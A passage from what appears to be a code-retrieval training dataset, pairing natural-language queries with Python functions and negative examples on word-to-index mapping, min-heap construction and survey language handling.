"def words_to_indices(self, words):\n assert isinstance(words, list)\n if all(isinstance(word, list) for word in words):\n return [self.words_to_indices(word) for word in words]\n assert all(isinstance(word, six.string_types) for word in words)\n if self.is_case_sensitive:\n return [self.vocabulary.get(word, self.unknown_index)\n for word in words]\n else:\n return [self.vocabulary.get(word.lower(), self.unknown_index)\n for word in words]",
"def sentences2idx(sentences, words):\r\n seq1 = []\r\n for sent in sentences:\r\n seq1.append(getSeq(sent,words)) # seq is a list of word indices which are in sentences\r\n x1,m1 = prepare_data(seq1)\r\n# print('x shape: {}\\nm shape: {}'.format(x1.shape, m1.shape))\r\n return x1, m1",
"def emailToVocabIndices(email, vocab_list):\n tokenList = emailToTokenList(email)\n indexList = [vocab_list[token] for token in tokenList if token in vocab_list]\n return indexList",
"def words2indices(self, words):\n return [self.word2index(w) for w in words]",
"def imdb2indices(inputs):\n X = [] # results\n word2index = imdb.get_word_index()\n word2index = {k:(v+3) for k,v in word2index.items()}\n word2index[\"<PAD>\"], word2index[\"<START>\"], word2index[\"<UNK>\"], word2index[\"<UNUSED>\"] = 0,1,2,3\n for input_ in inputs:\n X.append([])\n for word in input_:\n idx = word2index.get(word, word2index[\"<UNK>\"])\n X[-1].append(idx)\n return X",
"def tokens_to_indices(self, tokens):\n return([self.__getindex__(t) for t in tokens])",
"def convert_tokens_to_ids(self, tokens):\n return self.vocab.to_indices(tokens)",
"def get_index_mappings(words):\n return {c: i for i, c in enumerate(words)}, {i: c for i, c in enumerate(words)}",
"def word_indices(wordOccuranceVec):\n for idx in wordOccuranceVec.nonzero()[0]:\n for i in range(int(wordOccuranceVec[idx])):\n yield idx",
"def _convert_pairs_to_indices(sentences, word_dict, max_len=None,\n use_null=True):\n sizes = np.array([len(sent) for sent in sentences])\n if use_null:\n sizes += 1\n if max_len is not None:\n max_len += 1\n sizes = sizes * 0 + max_len\n\n if max_len is None:\n max_len = sizes.max()\n\n shape = (len(sentences), max_len)\n array = np.full(shape, word_dict[PADDING], dtype=np.int32)\n\n for i, sent in enumerate(sentences):\n indices = [word_dict[token] for token in sent]\n\n if use_null:\n indices = [word_dict[GO]] + indices\n\n array[i, :len(indices)] = indices\n\n return array, sizes",
"def make_indices(vocabulary): # TODO: write test\n embeddings_dict = bidict({token: i for token, i in zip(vocabulary, count(start=3))})\n embeddings_dict['SOS'] = special_tokens['SOS']\n embeddings_dict['EOS'] = special_tokens['EOS']\n embeddings_dict['UNK'] = special_tokens['UNK']\n return embeddings_dict",
"def text2index(self, text_array, word2int):\n text2index = []\n for sentence in text_array:\n indexes = []\n for word in sentence.split(' '):\n if word in word2int:\n indexes.append(word2int.get(word))\n else:\n indexes.append(\"1\") # <unk>\n text2index.append(indexes)\n return text2index",
"def supply_token_indices(instances, text_field_name: str, pretrained_tokenizer):\n for instance in instances:\n for token in instance.fields[text_field_name]:\n token.text_id = pretrained_tokenizer.tokenizer.convert_tokens_to_ids(token.text)",
"def words_to_indices(self, sentence):\n\t\tindices = []\n\t\tif self.bos:\n\t\t\tindices.append(2)\n\t\tfor word in sentence:\n\t\t\tif word in self.worddict:\n\t\t\t\tindices.append(self.worddict[word])\n\t\t\telse:\n\t\t\t\tindices.append(1)\n\t\tif self.eos:\n\t\t\tindices.append(3)\n\t\treturn indices",
"def decode_indices(indices, vocabulary):\n\n decoded_tokens = [vocabulary[index] for index in indices]\n return \" \".join(decoded_tokens)",
"def inverted_index_template(terms_list: list) -> list:\r\n inverted_index = []\r\n for i in range(len(terms_list)):\r\n inverted_index.append((i + 1, 0, 0, []))\r\n return inverted_index",
"def mapWord2index(self):\n # Add special tokens as first elements in word2index dictionary\n token_count = 0\n for token in [self.pad_token, self.sos_token, self.eos_token, self.unk_token]:\n if token:\n self.word2index[token] = token_count\n token_count += 1\n \n # If vocabulary is trimmed, use trimmed_word_count\n if self.min_word_count or self.max_vocab_size:\n for key in self.trimmed_word_count.keys():\n self.word2index[key] = token_count\n token_count += 1\n \n # If vocabulary is not trimmed, iterate through dataset \n else:\n for line in self.dataset.iloc[:, 0]:\n for word in line.split():\n if word not in self.word2index.keys():\n self.word2index[word] = token_count\n token_count += 1\n # Include strings from target column\n if self.target_col:\n for line in self.dataset.iloc[:, self.target_col]:\n for word in line.split():\n if word not in self.word2index.keys():\n self.word2index[word] = token_count\n token_count += 1\n \n self.word2index.default_factory = lambda: self.word2index[self.unk_token]"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Converts a given array into a min heap
|
def create_min_heap(self, arr):
n = len(arr)
# last n/2 elements will be leaf nodes (CBT property) hence already min heaps
# loop from n/2 to 0 index and convert each index node into min heap
for i in range(int(n / 2), -1, -1):
self.min_heapify(i, arr, n)
|
[
"def min_heapify(arr):\n parent = ((len(arr) - 1) - 1) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1",
"def heapify(self, array):\n\n heap = MinHeap()\n heap.list = array\n\n if len(heap.list) > 0:\n height = math.floor(math.log2(len(heap.list)))\n leaves_if_full = 2**height\n nodes_if_full = leaves_if_full * 2 - 1\n first_leaf = nodes_if_full - leaves_if_full\n for index in range(first_leaf,len(heap.list)):\n heap.percolate_up(index)\n return heap",
"def heapify(array):\n\n # Check given given parameter data type.\n if not type(array) == list:\n raise TypeError('array must be a list')\n\n n = len(array)\n for i in range(n//2-1, -1, -1):\n repair_heap(array, i, n)\n\n return array",
"def heapsort(arr):\n pass",
"def repair_heap(array, start_index, heap_size):\n\n # Check given given parameter data type.\n if not type(array) == list:\n raise TypeError('array must be a list')\n\n # Assume current node is max\n max_index = start_index\n left_child_index = 2*start_index+1\n right_child_index = 2*start_index+2\n\n # Check if left child node exists and has higher value than parent node\n if left_child_index < heap_size and \\\n array[left_child_index] > array[max_index]:\n max_index = left_child_index\n\n # Check if right child node exists and has even higher value\n # than both parent and left child node\n if right_child_index < heap_size and \\\n array[right_child_index] > array[max_index]:\n max_index = right_child_index\n\n # Swap values if root is not max\n if max_index != start_index:\n array[max_index], array[start_index] \\\n = array[start_index], array[max_index]\n repair_heap(array, max_index, heap_size)\n\n return array",
"def djikstra_heap(s=0):",
"def max_heapify(arr):\n parent = ((len(arr) - 1) - 1 ) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1\n return",
"def heap_sort(arr):\n max_heapify(arr)\n for i in range(len(arr) - 1):\n dequeue(arr, len(arr) - 1 - i)\n return arr",
"def build_heap(data):\n # The following naive implementation just sorts the given sequence\n # using selection sort algorithm and saves the resulting sequence\n # of swaps. This turns the given array into a heap, but in the worst\n # case gives a quadratic number of swaps.\n #\n # TODO: replace by a more efficient implementation\n swaps = []\n \n '''\n for i in range(len(data)):\n for j in range(i + 1, len(data)):\n if data[i] > data[j]:\n swaps.append((i, j))\n data[i], data[j] = data[j], data[i]\n '''\n \n '''\n #My implementation below, using SiftUp\n heap=[]\n #ipdb.set_trace()\n for i in range(len(data)):\n swaps.extend(heap_insert_sift_up(heap,data[i]))\n '''\n n=len(data)\n last_parent=math.ceil(n/2)-1\n for i in range(last_parent+1):\n sift_down(data,last_parent-i,swaps)\n \n #ipdb.set_trace()\n return data,swaps",
"def construct_minheap_recursive(arr):\n if len(arr) > 0:\n v = arr.pop()\n heap = BTNode(v)\n else:\n return None\n heap.left = construct_minheap_recursive(arr)\n heap.right = construct_minheap_recursive(arr)\n fix_minheap(heap, heap.value)\n return heap",
"def heapify(list_, max_=False):\n n = len(list_)\n if max_:\n less = operator.gt\n else:\n less = operator.lt\n for i in reversed(range(n//2)):\n _shift_down(list_, i, less)",
"def heapify(self, arg_items):\n # cleaning the present PQ\n self._array.clear()\n \n #fill the array\n for it in arg_items:\n self._array.append(it)\n \n #heapifying the unsorted input\n n = len(self._array)\n \n idx = n-1\n parent_idx = self._parent(idx)\n while ( parent_idx >= 0 ):\n self._sift_down(parent_idx)\n parent_idx -= 1\n \n return",
"def heapSortNonAscending(A, n):\r\n buildHeapMin(A, n)\r\n size = n\r\n for _ in range(n):\r\n A[0], A[size-1] = A[size-1], A[0]\r\n size -= 1\r\n siftDownMin(A, 0, size)",
"def heapRemoveSmallest(self,heap,vertices):\r\n vertices[heap[0][0]]=-1\r\n if len(heap)==1:\r\n heap.pop()\r\n return\r\n vertices[heap[len(heap)-1][0]] =0\r\n heap[0]=heap[len(heap)-1]\r\n heap.pop()\r\n if len(heap)>0:\r\n self.down(heap,0,vertices)",
"def build_random_heap(self, array):\n nodes_list = [Node(i) for i in array]\n # the first element is None - like in regular heap.\n nodes_list.insert(0, None)\n\n for i in range(1, len(nodes_list)):\n if (2 * i) <= (len(nodes_list) - 1):\n nodes_list[i].left_child = nodes_list[2 * i]\n nodes_list[2 * i].parent = nodes_list[i]\n\n if ((2 * i) + 1) <= (len(nodes_list) - 1):\n nodes_list[i].right_child = nodes_list[(2 * i) + 1]\n nodes_list[(2 * i) + 1].parent = nodes_list[i]\n self.root = nodes_list[1]",
"def test_build_minheap_recursive(self):\n ref = [1, 2, 3, 19, 17, 7, 25, 36, 100]\n res = min_heap.MinHeap([100, 36, 25, 19, 17, 7, 3, 2, 1])\n self.assertEqual(ref, res.array)",
"def kmin(array, k):\n array = np.ascontiguousarray(array, dtype='float32')\n m, n = array.shape\n I = np.zeros((m, k), dtype='int64')\n D = np.zeros((m, k), dtype='float32')\n ha = faiss.float_maxheap_array_t()\n ha.ids = swig_ptr(I)\n ha.val = swig_ptr(D)\n ha.nh = m\n ha.k = k\n ha.heapify()\n ha.addn(n, swig_ptr(array))\n ha.reorder()\n return D, I",
"def heapsort(arr):\n #print(arr)\n # Define heap class instance\n heap = Heap()\n\n # Pass parameter LIST received to heap class instance\n for i in arr: \n heap.insert(i) \n\n # it-is max-heap so : TOP ROOT WILL BE ALWAYS GREATER THAN ALL CHILDREN \n # here delete() function gives largest one so the new formed LIST will be reverse\n for i in range(0, heap.get_size()):\n arr[i] = heap.delete() \n \n # print(arr)\n # as because of max-heap structure need to reverse list to have asecending order-list\n arr.reverse() \n \n return arr",
"def heapify(arr, n, i):\n\tlargest = i\n\tleft = 2 * i + 1 # (2i + 1)\n\tright = 2 * i + 2 # (2i + 2)\n\n\t# See if left child of root exists and is\n\t# greater than root\n\tif left < n and arr[largest] < arr[left]:\n\t\tlargest = left\n\n\t# See if right child of root exists and is\n\t# greater than root\n\tif right < n and arr[largest] < arr[right]:\n\t\tlargest = right\n\n\t# Change root, if needed\n\tif largest != i:\n\t\tarr[largest], arr[i] = arr[i], arr[largest]\n\n\t\t# Heapify the root.\n\t\theapify(arr, n, largest)",
"def heap_sort(A):\n hs = HeapSort(A)\n hs.sort()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Assuming sub trees are already min heaps, converts tree rooted at current indx into a min heap.
|
def min_heapify(self, indx, arr, size):
# Get index of left and right child of indx node
left_child = indx * 2 + 1
right_child = indx * 2 + 2
smallest = indx
# check what is the smallest value node in indx, left child and right child
if left_child < size:
if arr[left_child] < arr[smallest]:
smallest = left_child
if right_child < size:
if arr[right_child] < arr[smallest]:
smallest = right_child
# if indx node is not the smallest value, swap with the smallest child
# and recursively call min_heapify on the respective child swapped with
if smallest != indx:
arr[indx], arr[smallest] = arr[smallest], arr[indx]
self.min_heapify(smallest, arr, size)
|
[
"def min_heapify(arr):\n parent = ((len(arr) - 1) - 1) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1",
"def repair_heap(array, start_index, heap_size):\n\n # Check given given parameter data type.\n if not type(array) == list:\n raise TypeError('array must be a list')\n\n # Assume current node is max\n max_index = start_index\n left_child_index = 2*start_index+1\n right_child_index = 2*start_index+2\n\n # Check if left child node exists and has higher value than parent node\n if left_child_index < heap_size and \\\n array[left_child_index] > array[max_index]:\n max_index = left_child_index\n\n # Check if right child node exists and has even higher value\n # than both parent and left child node\n if right_child_index < heap_size and \\\n array[right_child_index] > array[max_index]:\n max_index = right_child_index\n\n # Swap values if root is not max\n if max_index != start_index:\n array[max_index], array[start_index] \\\n = array[start_index], array[max_index]\n repair_heap(array, max_index, heap_size)\n\n return array",
"def construct_minheap_recursive(arr):\n if len(arr) > 0:\n v = arr.pop()\n heap = BTNode(v)\n else:\n return None\n heap.left = construct_minheap_recursive(arr)\n heap.right = construct_minheap_recursive(arr)\n fix_minheap(heap, heap.value)\n return heap",
"def heapRemoveSmallest(self,heap,vertices):\r\n vertices[heap[0][0]]=-1\r\n if len(heap)==1:\r\n heap.pop()\r\n return\r\n vertices[heap[len(heap)-1][0]] =0\r\n heap[0]=heap[len(heap)-1]\r\n heap.pop()\r\n if len(heap)>0:\r\n self.down(heap,0,vertices)",
"def heapify(self):\n n = len(self.storage)\n # Transform bottom-up. The largest idx there's any point to looking at is\n # the largest with a child idx in-range, so must have 2*idx + 1 < n,\n # or idx\n for i in reversed(range(n // 2)):\n self._sift_up(i)",
"def djikstra_heap(s=0):",
"def _mk_encode_tree(self):\n \n freq_heap = MinHeap.from_iterable(self.freq_list)\n while len(freq_heap) > 1:\n # get the nodes with the smallest frequency\n a = freq_heap.remove()\n b = freq_heap.remove()\n\n # make the new node and add it in it's proper position\n new_node = TreeNode(a.freq + b.freq, content = None)\n new_node.lchild = a\n new_node.rchild = b\n freq_heap.insert(new_node)\n\n return freq_heap.remove()",
"def min_heapify(a, n, idx):\n min_idx = idx\n left = 2*idx + 1\n right = 2*idx + 2\n\n if left < n and a[left] < a[min_idx]:\n min_idx = left\n if right < n and a[right] < a[min_idx]:\n min_idx = right\n\n if min_idx != idx:\n a[min_idx], a[idx] = a[idx], a[min_idx]\n min_heapify(a, n, min_idx)",
"def heapify(self, array):\n\n heap = MinHeap()\n heap.list = array\n\n if len(heap.list) > 0:\n height = math.floor(math.log2(len(heap.list)))\n leaves_if_full = 2**height\n nodes_if_full = leaves_if_full * 2 - 1\n first_leaf = nodes_if_full - leaves_if_full\n for index in range(first_leaf,len(heap.list)):\n heap.percolate_up(index)\n return heap",
"def build_tree(heap: list) -> HuffmanNode:\n while len(heap) > 1:\n node1 = heappop(heap)\n node2 = heappop(heap)\n merged = HuffmanNode(node1.weight + node2.weight)\n merged.left = node1\n merged.right = node2\n heappush(heap, merged)\n return heap[0]",
"def heapify(arr, n, i):\n\tlargest = i\n\tleft = 2 * i + 1 # (2i + 1)\n\tright = 2 * i + 2 # (2i + 2)\n\n\t# See if left child of root exists and is\n\t# greater than root\n\tif left < n and arr[largest] < arr[left]:\n\t\tlargest = left\n\n\t# See if right child of root exists and is\n\t# greater than root\n\tif right < n and arr[largest] < arr[right]:\n\t\tlargest = right\n\n\t# Change root, if needed\n\tif largest != i:\n\t\tarr[largest], arr[i] = arr[i], arr[largest]\n\n\t\t# Heapify the root.\n\t\theapify(arr, n, largest)",
"def _tree_min(self, subtree):\n walker_node = subtree\n while walker_node.left != NIL_NODE:\n walker_node = walker_node.left\n\n return walker_node",
"def test_build_minheap_recursive(self):\n ref = [1, 2, 3, 19, 17, 7, 25, 36, 100]\n res = min_heap.MinHeap([100, 36, 25, 19, 17, 7, 3, 2, 1])\n self.assertEqual(ref, res.array)",
"def test_minheap_build_minheap_recursive(self):\n ref = [1, 2, 3, 4, 7, 8, 9, 10, 14, 16]\n res = [1, 2, 3, 4, 7, 8, 9, 10, 14, 16]\n heap = min_heap.MinHeap()\n heap.build_min_heap(res)\n self.assertEqual(res, ref)",
"def sift_up(self, idx):\n parent = self.get_parent(idx)\n if (parent is None):\n return # Stop if we are at the root of the heap\n\n if (self.heap[idx] > self.heap[parent]):\n self.swap(idx, parent)\n return self.sift_up(parent)",
"def max_heapify(arr):\n parent = ((len(arr) - 1) - 1 ) // 2\n while parent >= 0:\n shift_down(arr, parent)\n parent -= 1\n return",
"def heap_sort(self):\r\n \r\n tempList = []\r\n \r\n #store size of heap\r\n size = self.heap_size\r\n \r\n for i in range(0,size):\r\n \r\n #call removeMax N times to return max element and remove max every iteration\r\n max = self.removeMax()\r\n \r\n tempList.append(max)\r\n \r\n #print(max._key,max._value,max._price)\r\n \r\n for i in range(0,size):\r\n \r\n self.insert(tempList[i])",
"def shallowest_spanning_tree(self):\r\n min = inf\r\n node = \"unassigned\"\r\n for i in range(self.size): # checks each node\r\n temp = self.nodes.copy()\r\n temp.remove(i)\r\n res = self.aux_sst(i) # calls auxiliary function\r\n if res < min: # returns node with min depth\r\n min = res\r\n node = i\r\n return node, min",
"def minChild(self, i):\n if i * 2 + 1 > self.currentSize:\n return i * 2\n else:\n if min(self.heapList[i*2], self.heapList[(i*2)+1]) == self.heapList[i*2]:\n return i*2\n else:\n return i*2 + 1",
"def build_heap(self, da: DynamicArray) -> None:\n \n # create a copy of the array\n newArr = DynamicArray()\n \n for num in range(da.length()):\n newArr.append(da[num])\n \n # assign the heap to the copied array and find first non-leaf node\n self.heap = newArr\n current = newArr.length() // 2 - 1\n \n # percolate current down to the correct spot and decrement current \n # until root is reached\n while current >= 0:\n self.percolate_down(current)\n current -= 1"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Get the language column and create a new k for it in the structure_by_section while creating a file_answer to be able to be plot later in analysis
|
def create_language_section(self, df, structure_by_section):
path_to_language = os.path.join('../survey_creation', self.year, self.country, 'listAnswers', 'languages.csv')
list_of_languages = self.df['startlanguage. Start language'].unique()
if len(list_of_languages) > 1:
with open(path_to_language, 'w+') as f:
for language in list_of_languages:
f.write(language)
f.write('\n')
dict_to_add = {0:{'language': [{'survey_q': ['startlanguage. Start language'],
'original_question': ['startlanguage. Start language'],
'answer_format': 'one choice',
'file_answer': path_to_language,
'order_question': False}]}}
structure_by_section.update(dict_to_add)
structure_by_section.move_to_end(0, last=False)
return self.df, structure_by_section
|
[
"def load_wiktionary(configuration, verbose=0):\n\n df = pandas.read_csv(configuration['wiktionary_translations_path'],\n sep='\\t', usecols=['ID', 'Concept_ID', 'Concept', 'Languoid', 'Language_name', 'Form'])\n\n\n if verbose:\n print()\n print('number of available languages', len(set(df.Language_name)))\n print('language that have Dutch in the name')\n for language in set(df.Language_name):\n if 'Dutch' in language:\n print(language)\n print('we use: Dutch; Flemish')\n\n df = df[df.Language_name == 'Dutch; Flemish']\n\n english_lemmas = []\n english_definitions = []\n\n for index, row in df.iterrows():\n concept = row['Concept']\n lemma, *definitions = concept.split('/')\n english_lemmas.append(lemma)\n english_definitions.append('/'.join(definitions))\n\n df['English_lemma'] = english_lemmas\n\n dutch2english = defaultdict(set)\n english2dutch = defaultdict(set)\n\n for index, row in df.iterrows():\n english_lemma = row['English_lemma']\n dutch_lemma = row['Form']\n dutch2english[dutch_lemma].add(english_lemma)\n english2dutch[english_lemma].add(dutch_lemma)\n\n if verbose:\n print(f'Dutch lemmas with English translations: {len(dutch2english)}')\n print(f'English lemmas with Dutch translations: {len(english2dutch)}')\n\n return dutch2english, english2dutch",
"def data_language(df):\n if \"date/time\" in df.columns:\n return \"English\"\n elif \"date/heure\" in df.columns:\n return \"French\"\n elif \"fecha y hora\" in df.columns:\n return \"Spanish\"\n elif \"Data/Ora:\" in df.columns:\n return \"Italian\"\n elif \"Datum/Uhrzeit\" in df.columns:\n return \"German\"",
"def section(c32, name):\n\n entries = documents.entries\n\n if 'document' == name:\n return c32.template('2.16.840.1.113883.3.88.11.32.1')\n if 'allergies' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.102')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.2')\n\n el.entries = entries\n return el\n if 'demographics' == name:\n return c32.template('2.16.840.1.113883.3.88.11.32.1')\n if 'encounters' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.127')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.3')\n\n el.entries = entries\n return el\n if 'immunizations' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.117')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.6')\n\n el.entries = entries\n return el\n if 'results' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.122')\n el.entries = entries\n return el\n if 'medications' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.112')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.8')\n\n el.entries = entries\n return el\n if 'problems' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.103')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.11')\n\n el.entries = entries\n return el\n if 'procedures' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.108')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.12')\n\n el.entries = entries\n return el\n if 'vitals' == name:\n el = c32.template('2.16.840.1.113883.3.88.11.83.119')\n if el.is_empty():\n el = c32.template('2.16.840.1.113883.10.20.1.16')\n\n el.entries = entries\n return el\n\n\n return None",
"def prepare_um(language):\n code = LANGUAGES[language]\n file_name = os.path.join(UNIMORPH_DIR, code, code)\n result = []\n with open(file_name) as file:\n for line in file:\n if line.split():\n lemma, inflected, features = line.strip().split(\"\\t\")\n features = set(features.split(\";\"))\n data = {\"word\": inflected, \"lemma\": lemma}\n data[\"pos\"] = map_pos(features)\n data[\"number\"] = map_number(features)\n data[\"gender\"] = map_gender(features)\n data[\"case\"] = map_case(features)\n data[\"person\"] = map_person(features)\n result.append(data)\n return pd.DataFrame(result)",
"def translate_section(data):\n sect_str = \"\"\n elements = data.get(\"Elements\", [])\n for elem in elements:\n print(\" Translating \" + elem[\"Type\"])\n sect_str += translate_map[elem[\"Type\"]](elem)\n return sect_str",
"def change_language():\n\tglobal language_dict,k\n\thello.config(text=language_dict[k])\n\tk = (1 + k) % 6",
"def write_languages(args):\n db = _db(args)\n api = _api(args)\n\n all_studies = _get_all_study_names(db)\n union_query_array = []\n union_query_withstudy_array = []\n for study in all_studies:\n union_query_array.append(\"SELECT * FROM Languages_%s\" % (study))\n union_query_withstudy_array.append(\n \"SELECT *, '%s' AS Study FROM Languages_%s\" % (study, study))\n\n # first check for language uniqueness across studies\n query = \"\"\"SELECT DISTINCT LanguageIx, count(*) AS c FROM (%s) AS t\n GROUP BY LanguageIx HAVING c > 1\"\"\" % (\n \" UNION \".join(union_query_array))\n data = list(db(query))\n if len(data) > 0:\n args.log.warning(\n \"\\nData of these languages differ across studies - please clean up data first:\")\n for row in data:\n args.log.warning(\"\\n\")\n for study in all_studies:\n query = \"\"\"SELECT LanguageIx, ShortName FROM Languages_%s\n WHERE LanguageIx = %s\"\"\" % (study, row['LanguageIx'])\n qdata = list(db(query))\n if len(qdata) > 0:\n args.log.warning(\"LanguageIx = %s (%s) in study %s\" % (\n qdata[0]['LanguageIx'], qdata[0]['ShortName'], study))\n return\n\n # make sure all studies will be concatenated\n db(\"SET @@group_concat_max_len = 4096\")\n query = \"\"\"SELECT DISTINCT *, GROUP_CONCAT(Study) AS Studies FROM (%s) AS t\n GROUP BY LanguageIx\"\"\" % (\" UNION \".join(union_query_withstudy_array))\n data = db(query)\n # header minus last two columns Study and Studies\n header = data.keys()[:-2]\n\n # go through each row, get mapping LanguageIx and Study and\n # delete the last two columns\n data_db = list()\n study_lg_map_data = list()\n for row in data:\n data_db.append(row[:-2])\n for s in row['Studies'].split(\",\"):\n study_lg_map_data.append([row['LanguageIx'], s])\n\n _write_csv_to_file(data_db, 'languages.csv', api, header)\n _write_csv_to_file(study_lg_map_data, 'x_study_languages.csv', api, [\n 'LanguageIx', 'StudyName'])",
"def build_LM(in_file):\n print('building language models...')\n # This is an empty method\n # Pls implement your code in below\n \n LM = {}\n \n # counting total number of 4-grams in each language in the training text\n total_no_of_words = {\"malaysian\":0, \"indonesian\":0, \"tamil\":0}\n \n with open(in_file, mode=\"r\", encoding=\"utf-8\") as f:\n textList = f.readlines()\n \n for line in textList:\n \n [label, text] = preprocess_line( line ).split(maxsplit=1)\n \n # count the number of 4-grams for each line in training text\n if len(text) >= 4 and label in total_no_of_words:\n total_no_of_words[label] += len(text) - 3\n else:\n sys.exit(\"Error! Some sentences in the training text contains \"\n \"less than 4 characters!!! OR the language is not \"\n \"malasian, indonesian, or tamil.\")\n \n grams = convert_line_to_4gramList(text)\n \n # update the count for each gram in our language model\n for gram in grams:\n \n # init to be zero\n if gram not in LM:\n LM[gram] = {\"malaysian\":0, \"indonesian\":0, \"tamil\":0}\n \n # update count\n LM[gram][label] += 1\n \n # add one smoothing for each gram\n for gram in LM:\n for lang in LM[gram]:\n LM[gram][lang] += 1\n \n return convert_counts_to_probability(total_no_of_words, LM)",
"def language_register(df):\n df['training language'] = ['None' if e == 'None' else corpora.language(e)\n for e in df['training set']]\n df['test language'] = ['None' if e == 'None' else corpora.language(e)\n for e in df['test set']]\n df['training register'] = ['None' if e == 'None' else corpora.register(e)\n for e in df['training set']]\n df['test register'] = ['None' if e == 'None' else corpora.register(e)\n for e in df['test set']]\n return df",
"def _collect_section_translations(exporter, sections, binding,\n export_what, key, rsrc):\n\n # For each section in the translation, make a record of that\n # in an internal data store which is used to generate .po\n # files.\n for section in sections:\n section_name = section['name']\n section_type = section['type']\n description = (\n binding.find_field(section_name).description or '')\n\n for translation in section['data']:\n message = translation['source_value'] or ''\n if not isinstance(message, basestring):\n message = unicode(message) # convert num\n translated_message = translation['target_value'] or ''\n is_current = translation['verb'] == VERB_CURRENT\n old_message = translation['old_source_value']\n\n # Skip exporting blank items; pointless.\n if not message:\n continue\n\n # If not exporting everything, and the current\n # translation is up-to-date, don't export it.\n if export_what != 'all' and is_current:\n continue\n\n # Set source string and location.\n message_entry = exporter.get_message(key, message)\n message_entry.add_location(key, section_name, section_type)\n\n # Describe the location where the item is found.\n message_entry.add_comment(description)\n\n try:\n resource_handler = resource.Registry.get(\n key.resource_key.type)\n title = resource_handler.get_resource_title(rsrc)\n if title:\n message_entry.add_comment(title)\n except AttributeError:\n # Under ETL, there is no real handler and title lookup\n # fails. In that case, we lose this data, which is non-\n # essential.\n pass\n\n # Add either the current translation (if current)\n # or the old translation as a remark (if we have one)\n if is_current:\n message_entry.add_translation(translated_message)\n else:\n message_entry.add_translation('')\n\n if old_message:\n message_entry.set_previous_id(old_message)\n if translated_message:\n message_entry.add_comment(\n 'Previously translated as: \"%s\"' %\n translated_message)",
"def prepare(language):\n ud = prepare_ud(language)\n try:\n um = prepare_um(language)\n result = pd.concat([ud, um], ignore_index=True, sort=False)\n except FileNotFoundError: # No UniMorph data for this language\n result = ud\n result[\"word\"] = result[\"word\"].str.lower()\n result[\"person\"] = result[\"person\"].astype(str)\n result.drop_duplicates(inplace=True)\n # drop rows with missing words\n result.dropna(subset=[\"word\", \"pos\"], how=\"any\", inplace=True)\n # drop rows with no feature values in all four features\n features = [\"number\", \"gender\", \"case\", \"person\"]\n has_no_values = (result[features] == NA).all(axis=1)\n result = result[~has_no_values]\n return result[COLS]",
"def reference_keys_to_dataset_keys(rmapping, header):\n header = dict(header)\n\n # Basic common pattern translations\n translations = {\n \"META.EXPOSURE.P_EXPTYPE\" : \"META.EXPOSURE.TYPE\",\n \"P_EXP_TY\" : \"META.EXPOSURE.TYPE\",\n\n \"META.INSTRUMENT.P_BAND\" : \"META.INSTRUMENT.BAND\",\n \"P_BAND\" : \"META.INSTRUMENT.BAND\",\n\n \"META.INSTRUMENT.P_DETECTOR\" : \"META.INSTRUMENT.DETECTOR\",\n \"P_DETECT\" : \"META.INSTRUMENT.DETECTOR\",\n\n \"META.INSTRUMENT.P_CHANNEL\" : \"META.INSTRUMENT.CHANNEL\",\n \"P_CHANNE\" : \"META.INSTRUMENT.CHANNEL\",\n\n \"META.INSTRUMENT.P_FILTER\" : \"META.INSTRUMENT.FILTER\",\n \"P_FILTER\" : \"META.INSTRUMENT.FILTER\",\n\n \"META.INSTRUMENT.P_PUPIL\" : \"META.INSTRUMENT.PUPIL\",\n \"P_PUPIL\" : \"META.INSTRUMENT.PUPIL\",\n\n \"META.INSTRUMENT.P_MODULE\" : \"META.INSTRUMENT.MODULE\",\n \"P_MODULE\" : \"META.INSTRUMENT.MODULE\",\n\n \"META.SUBARRAY.P_SUBARRAY\" : \"META.SUBARRAY.NAME\",\n \"P_SUBARR\" : \"META.SUBARRAY.NAME\",\n\n \"META.INSTRUMENT.P_GRATING\" : \"META.INSTRUMENT.GRATING\",\n \"P_GRATIN\" : \"META.INSTRUMENT.GRATING\",\n\n \"META.EXPOSURE.PREADPATT\" : \"META.EXPOSURE.READPATT\",\n \"META.EXPOSURE.P_READPATT\" : \"META.EXPOSURE.READPATT\",\n \"P_READPA\" : \"META.EXPOSURE.READPATT\",\n\n # vvvv Speculative, not currently defined or required by CAL vvvvv\n \"META.INSTRUMENT.PCORONAGRAPH\" : \"META.INSTRUMENT.CORONAGRAPH\",\n \"P_CORONM\" : \"META.INSTRUMENT.CORONAGRAPH\",\n }\n\n # Rmap header reference_to_dataset field tranlations, can override basic!\n try:\n translations.update(rmapping.reference_to_dataset)\n except AttributeError:\n pass\n\n log.verbose(\"reference_to_dataset translations:\\n\", log.PP(translations), verbosity=60)\n log.verbose(\"reference_to_dataset input header:\\n\", log.PP(header), verbosity=80)\n\n for key in header:\n # Match META.X.P_SOMETHING or P_SOMETH\n if (key.split(\".\")[-1].startswith(\"P_\")) and key not in translations:\n log.warning(\"CRDS-pattern-like keyword\", repr(key),\n \"w/o CRDS translation to corresponding dataset keyword.\")\n log.info(\"Pattern-like keyword\", repr(key),\n \"may be misspelled or missing its translation in CRDS. Pattern will not be used.\")\n log.info(\"The translation for\", repr(key),\n \"can be defined in crds.jwst.locate or rmap header reference_to_dataset field.\")\n log.info(\"If this is not a pattern keyword, adding a translation to 'not-a-pattern'\",\n \"will suppress this warning.\")\n\n # Add replacements for translations *if* the existing untranslated value\n # is poor and the translated value is better 